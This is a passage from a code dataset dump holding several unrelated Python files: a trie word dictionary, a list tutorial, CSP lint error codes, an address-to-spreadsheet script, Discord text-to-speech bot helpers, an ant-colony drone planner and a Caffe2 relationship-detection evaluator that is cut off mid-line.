__init__(self):\n self.children = {}\n self.end = False\n\nclass WordDictionary:\n\n def __init__(self):\n \"\"\"\n Initialize your data structure here.\n \"\"\"\n self.root = TrieNode()\n\n def addWord(self, word: str) -> None:\n \"\"\"\n Adds a word into the data structure.\n \"\"\"\n curr_node = self.root\n for i, val in enumerate(word):\n if val not in curr_node.children:\n curr_node.children[val] = TrieNode()\n curr_node = curr_node.children[val]\n curr_node.end = True\n\n\n def search(self, word: str) -> bool:\n \"\"\"\n Returns if the word is in the data structure. A word could contain the dot character '.' to represent any one letter.\n \"\"\"\n def dfs(node, i):\n if i == len(word): return node.end\n\n if word[i] == \".\":\n for child in node.children:\n if dfs(node.children[child], i+1): return True\n\n if word[i] in node.children:\n return dfs(node.children[word[i]], i+1)\n\n return False\n\n return dfs(self.root, 0)\n\n\nfrom var_dump import var_dump\n\n# Your WordDictionary object will be instantiated and called as such:\nobj = WordDictionary()\nobj.addWord('bad')\nobj.addWord('dad')\nobj.addWord('mad')\n\n\nvar_dump(obj)\n# param_2 = obj.search(word)\n","repo_name":"samayisrael/django_python_dev","sub_path":"play.py","file_name":"play.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74881441651","text":"nums = [1,2,3,4,5]\nprint(nums)\nprint('-'*100)\n\ndis_similar = ['Rahman',22,True,70.2]\nprint(dis_similar)\nprint('-'*100)\n\n\nsame_data = [10]*5\nprint(same_data)\nprint('-'*100)\n\n# ACCESSING\nprint(nums)\n\nprint(nums[0])\n\nprint(nums[0:4])\nprint('-'*100)\n\n\n#LOOPING\nprint('USING FOR LOOP')\nanimals = ['tiger','lion','crocodile','zebra','cat','dog']\nfor i in animals:\n print(i)\nprint('-'*100)\n\ni=0\nprint('USING WHILE LOOP')\nwhile(i<len(animals)):\n print(animals[i])\n i+=1\n\n'''\nPROPERTIES :\n 1. MUTABLE\n 2. CAN CONCATINATE\n 3. MERGABLE\n 4. CONVERTIBLE FROM OTHER\n 5. ALIAS\n 6. CLONING\n 7. SEARCHING\n 8. IDENTITY\n 9. COMPARISON\n 10. EMPTINESS\n'''\n\nprop_check = [10,20,30,40,50]\n#1\nprop_check[0] = 'Rahman'\n#2\nprop_check = prop_check + [60,70,80]\n#3\nrandom_list = [100,110,120]\nmerged_list = prop_check + random_list\n#4\nchars = list(\"Rahman\")\n#5\nlist_1 = [1,2,3,4,5]\nlist_2 = list_1 #referred\n#6\n#cloning / deep copy\nlist_3 = []\nlist_3 = list_3+list_1\n#7\nf = ['A','H','P','S','R']\nprint('R' in f)\n#8\nprint(list_1 is list_2)\n#9\na = [1,2,3,4]\nb = [1,2,5]\nprint(a<b)\n#10\nfull_list =[]\nif not full_list:\n print('Empty list')\n\n\n# BUILT IN FUNCTIONS \nlen(list_1)\nmax(list_1)\nmin(list_1)\nsum(a)\ndel(a[0])\nf.sort(reverse=False)\nf.reverse()\n\n#METHODS \nlist_1.append(99)\nlist_1.remove(99)\nlist_1.pop()\nlist_1.insert(99,0)\nlist_1.count(99)\nlist_1.index(4)\n\n# LIST OF LISTS / 2D LISTS\ntwo_d = [[1,2,3,4],[5,6,7,8],[9,10,11,12],[13,14,15,16]]\nprint(two_d)","repo_name":"mdrahmanabdul/Python-in-26-days","sub_path":"Day8-Lists/lists.py","file_name":"lists.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"23977468720","text":"import exstatic.warnings\n\n__all__ = ['errcodes', 'list_error_codes', 'create_error', 'reset_errors',\n 'get_errors', 'print_errors']\n\nerrcodes = {\n # Information.\n 'I001':'Function is a CSP process or server process',\n # Warnings.\n 'W001':'Channel in both readset and writeset.',\n 'W002':'No readset given in documentation.',\n 'W003':'No writeset given in documentation.',\n 'W004':'@process or @forever applied to method (rather than function)',\n # Errors.\n 'E001':'Process / forever decorator wraps a method, not a function.',\n 'E002':'Channel in readset is not a formal parameter to this process.',\n 'E003':'Channel in writeset is not a formal parameter to this process.',\n 'E004':'Channel appears in documented readset but not read from in function body.',\n 'E005':'Channel is read from in function body but does not appear in documented readset',\n 'E006':'Channel appears in documented writeset but not written to in function body.',\n 'E007':'Channel is written to in function body but does not appear in documented writeset'\n }\n\n\ncsp_error_list = exstatic.warnings.ExstaticErrorList(errcodes)\n\n\ndef list_error_codes():\n \"\"\"List all available error codes.\n \"\"\"\n sep = '--------------------------------------------------------------------'\n print ( sep )\n print ( ' CODE | MESSAGE' )\n codes = list(errcodes.keys())\n codes.sort()\n current_type = ''\n for key in codes:\n if key[0] != current_type:\n print ( sep )\n print ( str ( key ) + ': |' + str ( errcodes[key] ) )\n current_type = key[0]\n print ( sep )\n return\n\n\ndef create_error(filename, lineno, scope, errcode):\n \"\"\"Create a new error and add it to the list.\n \"\"\"\n return csp_error_list.create_error(filename, lineno, scope, errcode)\n\n\ndef reset_errors():\n \"\"\"Empty the current error list of all errors.\n \"\"\"\n csp_error_list.reset_errors()\n return\n\n\ndef get_errors(excluded=[]):\n \"\"\"Return the list of current errors.\n\n @return list of current errors.\n @type list\n \"\"\"\n return csp_error_list.get_errors(excluded=excluded)\n\ndef print_errors(excluded=[]):\n \"\"\"Print the list of current errors.\n \"\"\"\n csp_error_list.print_errors(excluded=excluded)\n return\n","repo_name":"futurecore/python-csp","sub_path":"exstatic/cspwarnings.py","file_name":"cspwarnings.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","stars":109,"dataset":"github-code","pt":"21"} +{"seq_id":"36988786127","text":"from openpyxl import load_workbook\r\n\r\n##################### FUNÇÕES\r\n\r\ndef escrevecsv(string_completa):\r\n f2 = open('excel.csv','a',encoding=\"utf8\")\r\n f2.write(string_completa+\"\\n\")\r\n f2.close()\r\n\r\n\r\ndef salvaArquivo(file):\r\n book.save(file)\r\n \r\n\r\ndef retira_acentuacoes_erradas(string):\r\n return string.replace(\"Ô\",\"Ô\").replace(\"Ó\",\"Ó\").replace(\"Ê\",\"Ê\").replace(\"Ç\",\"Ç\").replace(\"Ü\",\"U\").replace(\"É\",\"É\").replace(\"Ã\",\"Ã\").replace(\"Ú\",\"Ú\")\r\n\r\ndef retira_espacamentos(string):\r\n return string.strip().replace('A VENIDA','AVENIDA').replace('JA RDIM','JARDIM').replace('JAR DIM','JARDIM')\r\n\r\ndef le_arquivo(letra):\r\n f = open(\"ENDEREÇOS CONTRIBUINTES DE GUARARAPES.txt\",\"r\",encoding=\"utf8\")\r\n f1 = f.readlines()\r\n\r\n contador=0 # contador da lista f1\r\n proxima_linha_rua=0 # variavel para trablhar com a proxima linha na mesma string\r\n proxima_linha_bairro=0 # somente bairro\r\n string_completa=\"\"\r\n\r\n contador1=0\r\n\r\n \r\n for linha in f1:\r\n if 'Cadastro:' in linha:\r\n continue\r\n\r\n if proxima_linha_rua == 1:\r\n ## Verifica se é rua + bairro OU somente rua\r\n\r\n if 'Cadastro:' in linha or linha.startswith(\"1\"):\r\n continue\r\n if 'RUA' in linha: \r\n if string_completa != \"\":\r\n \r\n rua=retira_acentuacoes_erradas(linha[0:linha.find(',')+7])\r\n if linha[linha.find(',')+7:-1] != \"\":\r\n # TEM BAIRRO\r\n string_completa+='|'+rua+'|'+ linha[linha.find(',')+7:-1]\r\n \r\n escrevecsv(string_completa)\r\n proxima_linha_rua=0\r\n continue\r\n proxima_linha_rua=0\r\n \r\n if proxima_linha_bairro == 1:\r\n string_completa+=retira_acentuacoes_erradas(linha.strip('\\n'))\r\n # chamar função para dar append ao arquivo .csv\r\n escrevecsv(string_completa)\r\n proxima_linha_bairro=0\r\n continue\r\n \r\n if linha.startswith(letra) and linha.split(' ')[0] != 'RUA' and 'RUA' in linha or linha.startswith(letra) and 'AVENIDA' in linha:\r\n contador1+=1\r\n if 'RUA' in linha:\r\n nome = retira_acentuacoes_erradas(linha[0:linha.find('RUA')])\r\n delimitador_virgula=linha.find(',')+7\r\n rua=retira_acentuacoes_erradas(linha[linha.find('RUA'):delimitador_virgula])\r\n \r\n # verifica se após a \",\" existe algo , ou seja, o BAIRRO;\r\n if linha[delimitador_virgula:-1] != \"\":\r\n # Bairro existe\r\n bairro=retira_acentuacoes_erradas((linha[delimitador_virgula:-1]))\r\n string_completa=nome+'|'+rua+'|'+bairro\r\n escrevecsv(string_completa)\r\n else:\r\n # Sem bairro\r\n # Preciso pegar a linha de baixo\r\n string_completa=nome+'|'+rua+'|'\r\n proxima_linha_bairro+=1\r\n \r\n elif 'AVENIDA' in linha:\r\n nome = retira_acentuacoes_erradas(linha[0:linha.find('AVENIDA')])\r\n delimitador_virgula=linha.find(',')+7\r\n avenida= retira_acentuacoes_erradas(linha[linha.find('AVENIDA'):delimitador_virgula])\r\n # verifica se após a \",\" existe algo , ou seja, o BAIRRO;\r\n if linha[delimitador_virgula:-1] != \"\":\r\n # Bairro existe\r\n bairro=retira_acentuacoes_erradas(linha[delimitador_virgula:-1])\r\n string_completa=nome+'|'+avenida+'|'+bairro\r\n escrevecsv(string_completa)\r\n else:\r\n # Sem bairro\r\n # Preciso pegar a linha de baixo\r\n string_completa=nome+'|'+avenida+'|'\r\n proxima_linha_bairro+=1\r\n \r\n else:\r\n if linha.startswith(letra) and linha.split(' ')[0] != \"RUA\":\r\n contador1+=1\r\n ## Se a rua estiver na linha de baixo\r\n string_completa=linha.strip('\\n') # Somente o nome\r\n proxima_linha_rua+=1\r\n continue\r\n \r\n\r\n################### FIM FUNÇÕES\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#################### MAIN CODE\r\n\r\n\r\n\r\nwhile 1:\r\n letra=input(\"~~> Qual letra deve-se procurar ?(0) para verificar os ceps \")\r\n if letra == \"0\":\r\n break\r\n le_arquivo(letra)\r\n\r\n\r\nprint(\"Modifique a extensão de excel.csv para excel.xlsx.\")\r\ninput(\"ENTER PARA PROSSEGUIR\")\r\n\r\nfile='excel.xlsx'\r\nbook=load_workbook(file)\r\nsheet=book[book.sheetnames[0]]\r\n\r\nprint(\"[+] Arrumando os cep's...\")\r\n\r\nfor i in range(1,sheet.max_row):\r\n string=\"C\"+str(i)\r\n valorA1=\"\"\r\n \r\n try:\r\n valorA1=retira_espacamentos(sheet[string].value.strip())\r\n except:\r\n continue\r\n \r\n if 'GUARARAPES - SP 16700000GUARARAPES - SP 16700000' in valorA1:\r\n novo_valor=valorA1.replace(\"GUARARAPES - SP 16700000GUARARAPES - SP 16700000\",\"GUARARAPES - SP 16700000\")\r\n sheet[string]=novo_valor\r\n salvaArquivo(file)\r\n elif 'GUARARAPES' in valorA1 or 'GUARA RAPES' in valorA1:\r\n print(valorA1)\r\n continue\r\n else:\r\n #'GUARARAPES' not in valorA1 or 'GUARA RAPES' not in valorA1:\r\n # nao tem guararapes. Adicione\r\n novo_valor=valorA1+ \" GUARARAPES - SP 16700000\"\r\n sheet[string]=novo_valor\r\n salvaArquivo(file)\r\n \r\n print(valorA1 + \"---> \"+novo_valor)\r\n\r\n\r\n\r\n","repo_name":"igorsoares/Mala-Direta","sub_path":"Mala-Direta-Guararapes.py","file_name":"Mala-Direta-Guararapes.py","file_ext":"py","file_size_in_byte":5778,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33159735221","text":"import asyncio\nimport time\nfrom typing import Optional\n\nimport discord\nimport gtts\nfrom discord import Message\n\nfrom template import Context\n\n\nasync def __play_audio_file(ctx: Context, path: str):\n # ensure author in a voice channel\n author_voice_state: Optional[discord.VoiceState] = ctx.msg.author.voice\n if author_voice_state is None:\n await __resp_error(ctx, f\"{ctx.msg.author.name}#{ctx.msg.author.discriminator} is not in any voice channel\")\n return\n # ensure author and bot in the same voice channel\n bot_voice_client: discord.VoiceClient = discord.utils.get(ctx.cli.voice_clients, guild=ctx.msg.guild)\n if bot_voice_client is None:\n await author_voice_state.channel.connect()\n elif bot_voice_client.channel != author_voice_state.channel:\n await bot_voice_client.disconnect()\n await author_voice_state.channel.connect()\n\n # play audio file\n bot_voice_client: discord.VoiceClient = discord.utils.get(ctx.cli.voice_clients, guild=ctx.msg.guild)\n bot_voice_client.stop()\n bot_voice_client.play(discord.FFmpegPCMAudio(source=path))\n\n # last voice access\n ctx.cfg.last_voice_access = int(time.time())\n await __schedule_disconnect_voice(ctx, bot_voice_client)\n\n\nasync def __tts(ctx: Context, text: str):\n gtts.gTTS(text=text, lang=ctx.cfg.lang).save(ctx.cfg.tts_path)\n\n\nasync def __parse_mention(ctx: Context, text: str) -> str:\n text = text.replace(\"!\", \"\")\n for user in ctx.msg.mentions:\n if user.nick is not None:\n nick = user.nick\n else:\n nick = user.name\n mention = user.mention\n mention = mention.replace(\"!\", \"\")\n text = text.replace(mention, nick)\n return text\n\n\nasync def __filter_banned_user(ctx: Context) -> bool:\n if ctx.msg.author.discriminator not in ctx.cfg.ban_list:\n return False\n await __resp_warning(ctx, f\"{ctx.msg.author.name}#{ctx.msg.author.discriminator} has been banned\")\n return True\n\n\nasync def __resp_info(ctx: Context, text: str):\n await __schedule_delete_message(ctx, await ctx.msg.channel.send(embed=discord.Embed(\n title=\"**INFO**\",\n colour=0x00FF00,\n description=text,\n ).set_footer(text=\"INFO: intended use, need not to read\")))\n\n\nasync def __resp_warning(ctx: Context, text: str):\n await __schedule_delete_message(ctx, await ctx.msg.channel.send(embed=discord.Embed(\n title=\"**WARNING**\",\n colour=0xFFFF00,\n description=text,\n ).set_footer(text=\"WARNING: intended use, need to read\")))\n\n\nasync def __resp_error(ctx: Context, text: str):\n await __schedule_delete_message(ctx, await ctx.msg.channel.send(embed=discord.Embed(\n title=\"**ERROR**\",\n colour=0xFF0000,\n description=text,\n ).set_footer(text=\"ERROR: not intended use, need to read\")))\n\n\nasync def __schedule_disconnect_voice(ctx: Context, voice_client: discord.VoiceClient):\n \"\"\"schedule disconnecting voice after voice_timeout\"\"\"\n\n async def __disconnect_voice_task():\n \"\"\"task: disconnect voice after voice_timeout\"\"\"\n await asyncio.sleep(ctx.cfg.voice_timeout)\n elapsed = int(time.time()) - ctx.cfg.last_voice_access\n if voice_client.is_connected() and elapsed >= ctx.cfg.voice_timeout:\n await voice_client.disconnect()\n await __resp_info(ctx, \"voice has been disconnected due to inactivity\")\n\n asyncio.ensure_future(__disconnect_voice_task())\n\n\nasync def __schedule_delete_message(ctx: Context, msg: Message):\n \"\"\"schedule deleting message after resp_timeout\"\"\"\n\n async def __delete_message_task():\n \"\"\"task: delete message after resp_timeout\"\"\"\n await asyncio.sleep(ctx.cfg.resp_timeout)\n try:\n await msg.delete()\n except discord.errors.NotFound:\n pass\n\n asyncio.ensure_future(__delete_message_task())\n","repo_name":"khanh101/tts-bot","sub_path":"bot/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":3861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27247836310","text":"from domain.map import Map\nfrom domain.drone import Drone\nfrom domain.ant import Ant\nfrom domain.sensor_list import SensorList\nimport random\nfrom utils import *\nimport gui\n\n\nclass Controller:\n def __init__(self, map, drone):\n self.map = map\n self.drone = drone\n\n self.sensors = SensorList(self.map)\n self.pheromones = [[1.0 for _ in range(SENSOR_COUNT)] for _ in range(SENSOR_COUNT)]\n self.distances = self.sensors.get_distances_between_sensors()\n\n def move_ants(self, ants, alpha, beta, q0):\n \"\"\"\n Move all the ants\n :param ants: ants array\n :param alpha:\n :param beta:\n :param q0: the probability to pick the best solution\n :return: the ants that could travel to all the sensors.\n \"\"\"\n all_ants = [True for _ in ants]\n for i in range(len(ants)):\n ant = ants[i]\n for j in range(ANT_MOVES - 1):\n # if the ant can't perform a new move, we kill it\n possible_move = ant.next_move(self.distances, self.pheromones, q0, alpha, beta)\n if not possible_move:\n all_ants[i] = False\n break\n\n alive_ants = []\n for i in range(len(ants)):\n if all_ants[i]:\n ants[i].compute_fitness(self.distances)\n alive_ants.append(ants[i])\n return alive_ants\n\n def choose_best_ant(self, ants):\n \"\"\"\n choose the ant with the best fitness\n :param ants: the ants that travel to all the sensors.\n :return: the best ant\n \"\"\"\n best_ant = None\n best_fitness = INF\n\n for ant in ants:\n if best_fitness > ant.get_fitness():\n best_fitness = ant.get_fitness()\n best_ant = ant\n return best_ant\n\n def epoch(self, ants_count, alpha, beta, q0, rho):\n ants = [Ant(ANT_MOVES, BATTERY_STATUS) for _ in range(ants_count)]\n\n ants = self.move_ants(ants, alpha, beta, q0)\n\n for i in range(SENSOR_COUNT):\n for j in range(SENSOR_COUNT):\n self.pheromones[i][j] = (1 - rho) * self.pheromones[i][j]\n\n if not ants:\n return None\n\n new_pheromones = [1.0 / ant.get_fitness() for ant in ants]\n for i in range(len(ants)):\n current = ants[i].get_path()\n for j in range(len(current)-1):\n current_sensor = current[j]\n next_sensor = current[j+1]\n self.pheromones[current_sensor][next_sensor] += new_pheromones[i]\n\n return self.choose_best_ant(ants)\n\n def charge_sensors(self, battery_status, available_sensors):\n \"\"\"\n after traversing through all the sensors,\n we distribute the remaining battery in order to get the maximum surveyed cells\n :param battery_status: the remaining energy after a traversal\n :param available_sensors:\n :return:\n \"\"\"\n print(\"Battery left after shortest path: \", battery_status)\n sensors = []\n for i in range(len(self.sensors.get_sensor_list())):\n if i in available_sensors:\n sensors.append(self.sensors.get_sensor_list()[i])\n\n energy = [0 for _ in sensors]\n if battery_status <= 0:\n return energy\n\n sensors.sort(key=lambda s: (s.get_accessible_positions()[-1] / s.get_max_energy()))\n i = 0\n while i < len(sensors) and battery_status > 0:\n current_sensor_max_energy = sensors[i].get_max_energy()\n if battery_status > current_sensor_max_energy:\n battery_status -= current_sensor_max_energy\n energy[i] = current_sensor_max_energy\n else:\n energy[i] = battery_status\n battery_status = 0\n i += 1\n return energy\n\n def _iteration(self, best_choice):\n\n current_sol = self.epoch(30, alpha=1.9, beta=0.9, q0=0.5, rho=0.05)\n if current_sol is None:\n return best_choice\n\n length = len(current_sol.get_path())\n if best_choice is None or length > len(best_choice.get_path()) \\\n or (length == len(best_choice.get_path()) and current_sol.get_fitness() < best_choice.get_fitness()):\n return current_sol # new best solution\n return best_choice\n\n def generate_path(self, drone, sensors_path):\n [x, y] = drone.get_coordinates()\n sensor_list = self.sensors.get_sensor_list()\n current_sensor = sensor_list[sensors_path[0]]\n full_path = self.map.searchAStar(x, y, current_sensor.get_x(), current_sensor.get_y())[::-1]\n\n (x, y) = current_sensor.get_coords()\n\n for i in range(1, SENSOR_COUNT):\n current_sensor = sensor_list[sensors_path[i]]\n full_path += self.map.searchAStar(x, y, current_sensor.get_x(), current_sensor.get_y())[::-1]\n (x, y) = current_sensor.get_coords()\n return full_path\n\n def run(self):\n best_choice = None # will be the one with the largest number of visible positions\n for _ in range(1000):\n best_choice = self._iteration(best_choice)\n\n energy = self.charge_sensors(BATTERY_STATUS - best_choice.get_fitness(), best_choice.get_path())\n print('Energy distributed: ', energy)\n print('Best path: ', best_choice.get_path())\n\n return self.generate_path(self.drone, best_choice.get_path())\n\n def view_map(self):\n gui.movingDrone(self.map, self.sensors, self.run())\n\n def get_map(self):\n return self.map\n\n def get_surface(self):\n return self.map.surface\n\n def get_drone_position(self):\n return self.drone.get_coordinates()","repo_name":"GeorgeDanicico/Artificial-Intelligence-Year2","sub_path":"Assignment4/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":5728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7542937937","text":"from __future__ import absolute_import\nfrom __future__ import unicode_literals\nfrom __future__ import print_function\nfrom __future__ import division\n\nimport numpy as np\nimport logging\nimport os\nfrom collections import OrderedDict\nimport cPickle as pickle\n\nfrom core.config_rel import cfg\nfrom utils import helpers_rel\nfrom caffe2.python import workspace\n\nlogger = logging.getLogger(__name__)\n\n\nMIN_OVLP = 0.5\n\n\nclass Evaluator():\n\n def __init__(self, split, roidb_size):\n\n self._split = split\n\n self.spo_cnt = 0\n self.tri_top1_cnt = 0\n self.tri_top5_cnt = 0\n self.tri_top10_cnt = 0\n self.sbj_top1_cnt = 0\n self.sbj_top5_cnt = 0\n self.sbj_top10_cnt = 0\n self.obj_top1_cnt = 0\n self.obj_top5_cnt = 0\n self.obj_top10_cnt = 0\n self.rel_top1_cnt = 0\n self.rel_top5_cnt = 0\n self.rel_top10_cnt = 0\n\n self.tri_top1_acc = 0.0\n self.tri_top5_acc = 0.0\n self.tri_top10_acc = 0.0\n self.sbj_top1_acc = 0.0\n self.sbj_top5_acc = 0.0\n self.sbj_top10_acc = 0.0\n self.obj_top1_acc = 0.0\n self.obj_top5_acc = 0.0\n self.obj_top10_acc = 0.0\n self.rel_top1_acc = 0.0\n self.rel_top5_acc = 0.0\n self.rel_top10_acc = 0.0\n\n self.tri_rr = 0.0\n self.sbj_rr = 0.0\n self.obj_rr = 0.0\n self.rel_rr = 0.0\n\n self.tri_mr = 0.0\n self.sbj_mr = 0.0\n self.obj_mr = 0.0\n self.rel_mr = 0.0\n\n self.rank_k = 250\n self.all_rel_k = [1, 10, 70]\n\n self.det_list = \\\n ['image_id', 'image_idx',\n 'boxes_sbj', 'boxes_obj', 'boxes_rel',\n 'labels_sbj', 'labels_obj', 'labels_rel',\n 'scores_sbj', 'scores_obj', 'scores_rel',\n 'gt_labels_sbj', 'gt_labels_obj', 'gt_labels_rel',\n 'gt_boxes_sbj', 'gt_boxes_obj', 'gt_boxes_rel']\n self.all_dets = {key: [] for key in self.det_list}\n\n self.roidb_size = roidb_size\n self.tested = [set() for i in range(roidb_size)]\n\n self.all_det_labels = [[] for _ in self.all_rel_k]\n self.all_det_boxes = [[] for _ in self.all_rel_k]\n self.all_gt_labels = [[] for _ in self.all_rel_k]\n self.all_gt_boxes = [[] for _ in self.all_rel_k]\n\n if cfg.TEST.GET_ALL_LAN_EMBEDDINGS:\n self.all_obj_lan_embds = None\n self.all_prd_lan_embds = None\n if cfg.TEST.GET_ALL_VIS_EMBEDDINGS:\n self.all_sbj_vis_embds = []\n self.all_obj_vis_embds = []\n self.all_prd_vis_embds = []\n\n def reset(self):\n # this should clear out all the metrics computed so far except the\n # best_topN metrics\n logger.info('Resetting {} evaluator...'.format(self._split))\n self.spo_cnt = 0\n self.tri_top1_cnt = 0\n self.tri_top5_cnt = 0\n self.tri_top10_cnt = 0\n self.sbj_top1_cnt = 0\n self.sbj_top5_cnt = 0\n self.sbj_top10_cnt = 0\n self.obj_top1_cnt = 0\n self.obj_top5_cnt = 0\n self.obj_top10_cnt = 0\n self.rel_top1_cnt = 0\n self.rel_top5_cnt = 0\n self.rel_top10_cnt = 0\n\n self.tri_top1_acc = 0.0\n self.tri_top5_acc = 0.0\n self.tri_top10_acc = 0.0\n self.sbj_top1_acc = 0.0\n self.sbj_top5_acc = 0.0\n self.sbj_top10_acc = 0.0\n self.obj_top1_acc = 0.0\n self.obj_top5_acc = 0.0\n self.obj_top10_acc = 0.0\n self.rel_top1_acc = 0.0\n self.rel_top5_acc = 0.0\n self.rel_top10_acc = 0.0\n\n self.tri_rr = 0.0\n self.sbj_rr = 0.0\n self.obj_rr = 0.0\n self.rel_rr = 0.0\n\n self.tri_mr = 0.0\n self.sbj_mr = 0.0\n self.obj_mr = 0.0\n self.rel_mr = 0.0\n\n self.all_dets = {key: [] for key in self.det_list}\n\n self.tested = [set() for i in range(self.roidb_size)]\n\n self.all_det_labels = [[] for _ in self.all_rel_k]\n self.all_det_boxes = [[] for _ in self.all_rel_k]\n self.all_gt_labels = [[] for _ in self.all_rel_k]\n self.all_gt_boxes = [[] for _ in self.all_rel_k]\n\n if cfg.TEST.GET_ALL_LAN_EMBEDDINGS:\n self.all_obj_lan_embds = None\n self.all_prd_lan_embds = None\n if cfg.TEST.GET_ALL_VIS_EMBEDDINGS:\n self.all_sbj_vis_embds = []\n self.all_obj_vis_embds = []\n self.all_prd_vis_embds = []\n\n def eval_im_dets_triplet_topk(self):\n\n prefix = 'gpu_' if cfg.DEVICE == 'GPU' else 'cpu_'\n\n if cfg.TEST.GET_ALL_LAN_EMBEDDINGS:\n if self.all_obj_lan_embds is None:\n self.all_obj_lan_embds = workspace.FetchBlob(\n prefix + '{}/{}'.format(cfg.ROOT_DEVICE_ID, 'all_obj_lan_embds'))\n if self.all_prd_lan_embds is None:\n self.all_prd_lan_embds = workspace.FetchBlob(\n prefix + '{}/{}'.format(cfg.ROOT_DEVICE_ID, 'all_prd_lan_embds'))\n\n new_batch_flag = False\n for gpu_id in range(cfg.ROOT_DEVICE_ID, cfg.ROOT_DEVICE_ID + cfg.NUM_DEVICES):\n\n image_idx = workspace.FetchBlob(\n prefix + '{}/{}'.format(gpu_id, 'image_idx'))[0]\n subbatch_id = workspace.FetchBlob(\n prefix + '{}/{}'.format(gpu_id, 'subbatch_id'))[0]\n if subbatch_id in self.tested[image_idx]:\n continue\n new_batch_flag = True\n self.tested[image_idx].add(subbatch_id)\n\n self.all_dets['image_idx'].append(int(image_idx))\n image_id = workspace.FetchBlob(\n prefix + '{}/{}'.format(gpu_id, 'image_id'))[0]\n self.all_dets['image_id'].append(image_id)\n\n scale = \\\n workspace.FetchBlob(prefix + '{}/{}'.format(gpu_id, 'image_scale'))[0]\n gt_labels_sbj = workspace.FetchBlob(prefix + '{}/{}'.format(\n gpu_id, 'sbj_pos_labels_int32'))\n gt_labels_obj = workspace.FetchBlob(prefix + '{}/{}'.format(\n gpu_id, 'obj_pos_labels_int32'))\n gt_labels_rel = workspace.FetchBlob(prefix + '{}/{}'.format(\n gpu_id, 'rel_pos_labels_int32'))\n\n gt_labels_sbj -= 1\n gt_labels_obj -= 1\n gt_labels_rel -= 1\n gt_boxes_sbj = workspace.FetchBlob(prefix + '{}/{}'.format(\n gpu_id, 'sbj_gt_boxes')) / scale\n gt_boxes_obj = workspace.FetchBlob(prefix + '{}/{}'.format(\n gpu_id, 'obj_gt_boxes')) / scale\n gt_boxes_rel = workspace.FetchBlob(prefix + '{}/{}'.format(\n gpu_id, 'rel_gt_boxes')) / scale\n self.all_dets['gt_labels_sbj'].append(gt_labels_sbj)\n self.all_dets['gt_labels_obj'].append(gt_labels_obj)\n self.all_dets['gt_labels_rel'].append(gt_labels_rel)\n self.all_dets['gt_boxes_sbj'].append(gt_boxes_sbj)\n self.all_dets['gt_boxes_obj'].append(gt_boxes_obj)\n self.all_dets['gt_boxes_rel'].append(gt_boxes_rel)\n\n num_proposals = int(workspace.FetchBlob(\n prefix + '{}/{}'.format(gpu_id, 'num_proposals'))[0])\n if num_proposals == 0:\n det_boxes_sbj = np.empty((0, 4), dtype=np.float32)\n det_boxes_obj = np.empty((0, 4), dtype=np.float32)\n det_boxes_rel = np.empty((0, 4), dtype=np.float32)\n det_labels_sbj = np.empty((0, 20), dtype=np.int32)\n det_labels_obj = np.empty((0, 20), dtype=np.int32)\n det_labels_rel = np.empty((0, 20), dtype=np.int32)\n det_scores_sbj = np.empty((0, 20), dtype=np.float32)\n det_scores_obj = np.empty((0, 20), dtype=np.float32)\n det_scores_rel = np.empty((0, 20), dtype=np.float32)\n else:\n det_boxes_sbj = workspace.FetchBlob(prefix + '{}/{}'.format(\n gpu_id, 'sbj_rois'))[:, 1:] / scale\n det_boxes_obj = workspace.FetchBlob(prefix + '{}/{}'.format(\n gpu_id, 'obj_rois'))[:, 1:] / scale\n det_boxes_rel = workspace.FetchBlob(prefix + '{}/{}'.format(\n gpu_id, 'rel_rois_prd'))[:, 1:] / scale\n det_labels_sbj = \\\n workspace.FetchBlob(prefix + '{}/{}'.format(gpu_id, 'labels_sbj'))\n det_labels_obj = \\\n workspace.FetchBlob(prefix + '{}/{}'.format(gpu_id, 'labels_obj'))\n det_labels_rel = \\\n workspace.FetchBlob(prefix + '{}/{}'.format(gpu_id, 'labels_rel'))\n det_scores_sbj = \\\n workspace.FetchBlob(prefix + '{}/{}'.format(gpu_id, 'scores_sbj'))\n det_scores_obj = \\\n workspace.FetchBlob(prefix + '{}/{}'.format(gpu_id, 'scores_obj'))\n det_scores_rel = \\\n workspace.FetchBlob(prefix + '{}/{}'.format(gpu_id, 'scores_rel'))\n self.all_dets['boxes_sbj'].append(det_boxes_sbj)\n self.all_dets['boxes_obj'].append(det_boxes_obj)\n self.all_dets['boxes_rel'].append(det_boxes_rel)\n self.all_dets['labels_sbj'].append(det_labels_sbj)\n self.all_dets['labels_obj'].append(det_labels_obj)\n self.all_dets['labels_rel'].append(det_labels_rel)\n self.all_dets['scores_sbj'].append(det_scores_sbj)\n self.all_dets['scores_obj'].append(det_scores_obj)\n self.all_dets['scores_rel'].append(det_scores_rel)\n\n if cfg.TEST.GET_ALL_VIS_EMBEDDINGS:\n embds_sbj = workspace.FetchBlob(prefix + '{}/{}'.format(\n gpu_id, 'x_sbj'))\n embds_obj = workspace.FetchBlob(prefix + '{}/{}'.format(\n gpu_id, 'x_obj'))\n embds_prd = workspace.FetchBlob(prefix + '{}/{}'.format(\n gpu_id, 'x_rel'))\n self.all_sbj_vis_embds.append(embds_sbj)\n self.all_obj_vis_embds.append(embds_obj)\n self.all_prd_vis_embds.append(embds_prd)\n\n if self._split != 'test':\n self.spo_cnt += len(gt_labels_sbj)\n for ind in range(len(gt_labels_sbj)):\n if gt_labels_sbj[ind] in det_labels_sbj[ind, :1] and \\\n gt_labels_obj[ind] in det_labels_obj[ind, :1] and \\\n gt_labels_rel[ind] in det_labels_rel[ind, :1]:\n self.tri_top1_cnt += 1\n if gt_labels_sbj[ind] in det_labels_sbj[ind, :1]:\n self.sbj_top1_cnt += 1\n if gt_labels_obj[ind] in det_labels_obj[ind, :1]:\n self.obj_top1_cnt += 1\n if gt_labels_rel[ind] in 